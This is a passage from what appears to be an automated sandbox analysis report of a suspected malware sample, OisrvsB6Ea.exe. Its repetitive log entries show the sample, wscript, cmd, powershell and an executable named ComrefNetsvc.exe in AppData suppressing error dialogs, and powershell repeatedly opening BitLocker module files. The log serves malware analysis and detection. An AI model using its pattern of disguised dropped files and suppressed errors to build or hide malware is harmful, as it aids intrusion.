                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
